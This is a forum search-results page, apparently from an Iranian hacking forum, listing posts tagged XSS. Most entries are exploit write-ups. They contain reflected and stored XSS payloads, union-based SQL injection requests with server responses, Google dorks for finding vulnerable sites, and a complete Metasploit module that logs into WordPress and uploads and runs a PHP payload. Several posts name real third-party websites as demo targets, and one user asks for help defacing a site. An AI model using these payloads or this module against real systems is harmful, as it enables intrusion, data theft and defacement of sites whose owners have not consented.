iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'xss'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

69 نتیجه پیدا شد

  1. |--------------------------------------------------------------| |[+] Exploit Title:show book XSS Vulnerability |[+] Date:27/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:http://www.lib.ubu.ac.th |[+] dork: allinurl:/show-book.php?ID= |[+] ME:Rednofozi@hotmail.com |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Inj3ct0r |[+] Vulnerability Type :XSS Vulnerability |[+] Severity Level :Med. |[+] Exploit :info--------------> XSS Vulnerability ***************************************************************| [+]Google Search allinurl:/show-book.php?ID= [+]The End , Enjoy Of Hacking ...! <script>alert("rednofozi")</script> ***************************************************************| |--------------------------------------------------------------| XSS Vulnerability http://www.lib.ubu.ac.th/rarebook/show-book.php?id=132 **************************************************************** Discovered by : Inj3ct0r |RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi.Inj3ct0r http://www.exploit4arab.org/exploits/2199
  2. Rednofozi

    Kali Linux

    XSS attacks with XSStrike tool to test attacks and exploit them. XSS attacks with the XSStrike tool A tool for xss attacks that you can take from a variety of methods and methods This professional tool lets you scan the site from this bug, which manages professional and specialized XSS Possibilities Use GET and POST methods Ability to remove cookies WAF Baptism Ability to beat hard filters in strong firewalls Use strong encryption Making smart pills Explanation Installed on Windows systems and Linux types Using Python 2.7 Use this tool to take your xss attacks a step further and work professionally Installation First, get the hub from the gateway link git clone https://github.com/UltimateHackers/XSStrike git clone https://github.com/UltimateHackers/XSStrike Inside the toolbox <span class = "pl-c1"> cd </ span> XSStrike <span class = "pl-c1"> cd </ span> XSStrike Start the installation with the following installation pip install -r requirements.txt pip install -r requirements.txt To run it python xsstrike python xsstrike Or only xsstrike xss tools one git - XSStrike tool for xss attacks download link https://github.com/UltimateHackers/XSStrike The gate
  3. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload", 'Description' => %q{ This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Arash Khazaei', # EDB PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'EDB', '37998' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Responsive Thumbnail Slider Plugin v1.0', { } ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 28 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]), OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]), OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ]) ]) end def check # The version regex found in extract_and_check_version does not work for this plugin's # readme.txt, so we build a custom one. check_code = check_version || check_plugin_path if check_code return check_code else return CheckCode::Safe end end def check_version plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.body && res.body =~ /Version:([\d\.]+)/ version = Gem::Version.new($1) if version <= Gem::Version.new('1.0') vprint_status("Plugin version found: #{version}") return CheckCode::Appears end end nil end def check_plugin_path plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.code == 200 vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected') return CheckCode::Detected end nil end def login auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD']) return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies) print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}") auth_cookies end def upload_payload(cookies) manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management' file_payload = get_write_exec_payload(:unlink_self => true) file_name = "#{rand_text_alpha(5)}.php" # attempt to access plugins page plugin_res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies ) unless plugin_res && plugin_res.body.include?("tmpl-uploader-window") fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page") end data = Rex::MIME::Message.new data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"") data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"") data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"") post_data = data.to_s # upload the file upload_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'), 'cookie' => cookies, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies) fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/) retrieve_file(page, cookies) end def retrieve_file(res, cookies) fname = res.body.scan(/slider\/(.*\.php)/).flatten[0] fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil? file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}") print_good("Successful upload") send_request_cgi( 'uri' => file_uri, 'method' => 'GET', 'cookie' => cookies ) end def exploit unless check == CheckCode::Safe auth_cookies = login upload_payload(auth_cookies) end end end
  4. # Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://vetclinic.sourceforge.io/ # Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download # Version: 00.02 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/petmaint.php?editpetnum=[SQL] # # [PATH]/petmaint.php # .... #154 $editpetnum = ""; #155 #156 if(isset($_POST["editpetnum"])) { #157 $editpetnum = $_POST["editpetnum"]; #158 unset($_POST["editpetnum"]); #159 } #160 else if(isset($_GET["editpetnum"])) { #161 $editpetnum = $_GET["editpetnum"]; #162 unset($_GET["editpetnum"]); #163 } # .... GET /[PATH]/petmaint.php?editpetnum=-0x496873616e2053656e63616e+UniOn++SeLect++0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2cCONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:18:01 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Set-Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/procmaint.php?proccode=[SQL] # # [PATH]/procmaint.php # .... #28 require_once "includes/common.inc"; #29 $emplnumber = $_SESSION['employeenumber']; #30 $display = "ProcMaint:".$emplnumber; #31 if(isset($_GET["proccode"])) { #32 $proccode = $_GET["proccode"]; #33 } else { #34 $proccode = ""; #35 } #36 if ($proccode == "") #37 { # .... GET /[PATH]/procmaint.php?proccode=%27%27%27%27+unioN+selECt++nuLL,nuLL,nuLL,conCAT(0x496873616e2053656e63616e),nuLL--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:22:33 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2697 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  5. |[+] Exploit Title:Organizer XSS and SQL Injection Vulnerability |[+] Date:18/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: http://po.shaftnet.org/ |[+] dork:# "intext:"Powered by Photo Organizer" |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] Software Link: http://po.shaftnet.org/#download |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |-------------------------------------------------------------- |[+] RHG hackers iran team ***************************************************************| 0x01# ~ Introduction ==================== At its most basic level, Photo Organizer is (yet another) a multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical “I need to share some images on the web and blog about it” crowd. It does not make the assumption that just because you have an image, you want to share it with someone. It combines “we'd like to show people some photos” with “we have a lot of photos we just store and annotate.” To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository. 0x02# ~ Exploitation ==================== 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Boolean SQL Injection & Blind [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 http://site.com/user.php?user=1 and 1=2 http://site.com/user.php?user=1 union select 1,2-- http://site.com/user.php?user=-1 OR 17-7=10 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Reflected XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):login.php search.text.general.php login.php?operation=get_email register.php ========================== HTTP REQUEST XSS 1 ============================== Host site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 113 POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0 XSS Proof Image: http://i.imgur.com/VmbmuiZ.png ============================================================================ ========================== HTTP REQUEST XSS 2 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/search.text.general.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 109 POST: search_string='"><script>alert('1337')</script>&search_type=¤t_user=all&x=0&y=0 XSS Proof Image: http://i.imgur.com/PDcO50Y.png ============================================================================ ========================== HTTP REQUEST XSS 3 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php?operation=get_email Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 91 POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0 XSS Proof Image: http://i.imgur.com/MFc5unu.png ============================================================================ ========================== HTTP REQUEST XSS 4 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/register.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 207 POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0 XSS Proof Image: http://i.imgur.com/7T4WZMW.png ============================================================================ 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Persistent XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):album.add.php?parent= ========================== HTTP REQUEST XSS 5 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/album.add.php?parent= Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 132 POST: album_caption='"><script>alert('sss')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0 XSS Proof Image: http://i.imgur.com/TrzBqXJ.png **************************************************************** Discovered by :Rednofozi RGH team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2173
  6. rezasarwary

    Hacking-Bugs

    سلام من یک سایت رو پیدا کردم که باگ xss داره و چند مرحله رو رفتم ولی میخوام که محتوای یه خط از سایت رو تغیر بدم نمیشه شاید کدم مشکل داشته باشه یکی کمکم کنه. کد:::::: "/><script>document.getElementByClassName('head').innerHTML="HI ADMIN"</script>
  7. |--------------------------------------------------------------| |[+] Exploit Title:Powered Photo Organizer XSS and SQL Vulnerabilities |[+] Date:13/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: http://po.shaftnet.org/ |[+] dork:# "intext:"Powered by Photo Organizer" |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] Software Link: http://po.shaftnet.org/#download |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |-------------------------------------------------------------- |[+] RHG hackers iran team ***************************************************************| 0x01# ~ Introduction ==================== At its most basic level, Photo Organizer is (yet another) a multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical “I need to share some images on the web and blog about it” crowd. It does not make the assumption that just because you have an image, you want to share it with someone. It combines “we'd like to show people some photos” with “we have a lot of photos we just store and annotate.” To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository. 0x02# ~ Exploitation ==================== 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Boolean SQL Injection & Blind [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 http://site.com/user.php?user=1 and 1=2 http://site.com/user.php?user=1 union select 1,2-- http://site.com/user.php?user=-1 OR 17-7=10 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Reflected XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):login.php search.text.general.php login.php?operation=get_email register.php ========================== HTTP REQUEST XSS 1 ============================== Host site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 113 POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0 XSS Proof Image: http://i.imgur.com/VmbmuiZ.png ============================================================================ ========================== HTTP REQUEST XSS 2 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/search.text.general.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 109 POST: search_string='"><script>alert('1337')</script>&search_type=¤t_user=all&x=0&y=0 XSS Proof Image: http://i.imgur.com/PDcO50Y.png ============================================================================ ========================== HTTP REQUEST XSS 3 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php?operation=get_email Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 91 POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0 XSS Proof Image: http://i.imgur.com/MFc5unu.png ============================================================================ ========================== HTTP REQUEST XSS 4 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/register.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 207 POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0 XSS Proof Image: http://i.imgur.com/7T4WZMW.png ============================================================================ 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Persistent XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):album.add.php?parent= ========================== HTTP REQUEST XSS 5 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/album.add.php?parent= Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 132 POST: album_caption='"><script>alert('sss')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0 XSS Proof Image: http://i.imgur.com/TrzBqXJ.png **************************************************************** Discovered by :RednofoziRGH team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2136
  8. Rednofozi

    Pro-Exploit

    [+] Exploit Title: eSearch Logistics Xss Vulnerability |[+] Date:13/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: http://www.esearchlogistics.com |[+] dork:# "inurl:"contentPage.php?id=" site:in' |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |-------------------------------------------------------------- |[+] RHG hackers iran team ***************************************************************| # {INFO} # ContentPage.php?ID= ----- Xss Vulnerability 1-Google opened 2-Reveal the item on Google 3-Then copy the sprite to the alert <script>alert("nofozi")</script> **************************************************************** # {DEMO} # 01: http://www.cat-egypt.com/ContentPage.php?ID=1_1 # 02: http://www.mrgreenwood.com/evolve/templates/contentpage.php?id=70 # 03: http://www.dependodrain.com/contentPage.php?id=5 # 04: http://www.dependodrain.com/contentPage.php?id=5 # 05 http://www.vinomaniawines.com/contentpage.php?id=34 # 06: # 07: # 08: <script>alert("nofozi")</script> # 09: # 10:----------------------------| **************************************************************** Discovered by : Rednofozi RGH team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2135
  9. |--------------------------------------------------------------| |[+] Exploit Title:Designed by Iranian Government Sites SQL Injection and xss Vulnerability |[+] Date:12/10/2018 [+] Category: Webapps |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Google Dork: 'inurl:/view_page_one.php?v=" |[+] Vendor Homepage : http://jovainco.com/ |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |--------------------------------------------------------------| |[+]|[+] Exploit :info # 1. Description: <script>alert("You Are Hacked")</script> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 ****************************************************************| |[+] Exploit Info : {DEMO} http://jovainco.com/view_page_one.php?v= You have an error in your SQL http://snco.ir/view_page_one.php?v= You have an error in your SQL hhttp://www.upsb.ir/view_page_one.php?v= You have an error in your SQL |--------------------------------------------------------------| http://www.exploit4arab.org/exploits/2131
  10. Rednofozi

    Hacking-Bugs

    قوانین تاپیک اسپم مننوع سوال بی جا ممنوع در بخش پرس پاسخ سوال کنید این تاپیک فقط دستوراتی که باگ رو باهاش میشه شناسایی کرد اموزش دهنده inj3ct0r Rednofozi ReZa CLONER Moeein Seven
  11. CMS ISWEB 3.5.3 XSS Reflected > CVE CVE-2018-15562 > Parameter vuln: ordineRis, sezioneRicerca oggettiRicerca > Vendor of Product CMS ISWEB 3.5.3 > Attack Vectors Payload:"><svg/onload=alert(String.fromCharCode(88,83,83))> URL: http://www.isweb.it/index.php?azione=cerca&id_sezione=505&ordineRis=default&sezioneRicerca=505&oggettiRicerca="><svg/onload=alert(String.fromCharCode(88,83,83))> > Discoverer Offensive0Labs - Thiago "thxsena" Sena & Rafael Fontes Souza
  12. ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. by Rednofozi anonysec hackers iran .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' ==================================================================================== # Exploit Title: Design by eSearch Logistics Xss Vulnerability # Exploit Author: Rednofozi # Date:29-09-2018 # Email: Rednofozi@yahoo.com # Vendor Homepage: http://www.esearchlogistics.com # OUR SITE : https://anonysec.org/ |==================================================================================== # {INFO} # ContentPage.php?ID= ----- Xss Vulnerability 1-Google opened 2-Reveal the item on Google 3-Then copy the sprite to the alert <script>alert("rednofozi")</script> |==================================================================================== # {DORK} # "inurl:"contentPage.php?id=" site:com' |==================================================================================== |==================================================================================== # {DEMO} # 01: http://www.cat-egypt.com/ContentPage.php?ID=1_1 # 02: http://www.mrgreenwood.com/evolve/templates/contentpage.php?id=70 # 03: http://www.dependodrain.com/contentPage.php?id=5 # 04: http://www.dependodrain.com/contentPage.php?id=5 # 05 http://www.vinomaniawines.com/contentpage.php?id=34 # 06: # 07: # 08: <script>alert("rednofozi")</script> # 09: # 10: |==================================================================================== # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By :Rednofozi # >>> tlg me:rednofozi |==================================================================================== The END ; Good Luck :D:D:D http://www.exploit4arab.org/exploits/2056
  13. # Exploit Title: WordPress WebARX Website Firewall - Stored XSS and firewall bypass. # Type: WordPress Plugin # Date: 2018-09-27 # Exploit Author: ed0x21son # Vendor Homepage: https://www.webarxsecurity.com # Software Link: http://update.webarxsecurity.com/wp-update-server/?action=download&slug=webarx # Version: 1.3.0 # Category: WebApps, WordPress # Tested on: WordPress 4.9.8 [Vulnerabilities] #1: Unauthenticated stored XSS: curl -I -H 'X-Forwarded-For: <script>alert("U-H4V3-B33N-PWN3D")</script>' 'http://localhost/?xss=<script>alert(/pwn3d/)</script>' Go to Wordpress dashboard and view WebARX logs: pwnd! #2: Firewall bypass: U can bypass all firewall security and rules if u add "cc=1" to the Post or Get payload. Blocked by firewall: curl 'http://localhost/?xss=<script>alert(/pwn3d/)</script>' Not blocked by firewall: curl 'http://localhost/?xss=<script>alert(/pwn3d/)</script>&cc=1'
  14. Rednofozi

    Hacking

    بصورت آنلاین وبسایت های مورد نظر رو اسکن کنید:) Free online XSS scanner
  15. [+] Title :- Photo Organizer - XSS and SQL Vulnerabilities [+] Date :- 2018-09-10 [+] Exploit Author :- Rednofozi [+] Vendor Homepage :- http://po.shaftnet.org/ [+] Version :- All Versions [+] Software Link: :- http://po.shaftnet.org/#download [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- intext:"Powered by Photo Organizer" [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ########################################################  0x01# ~ Introduction ==================== At its most basic level, Photo Organizer is (yet another) a multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical “I need to share some images on the web and blog about it” crowd. It does not make the assumption that just because you have an image, you want to share it with someone. It combines “we'd like to show people some photos” with “we have a lot of photos we just store and annotate.” To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository. 0x02# ~ Exploitation ==================== 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Boolean SQL Injection & Blind [+] 0 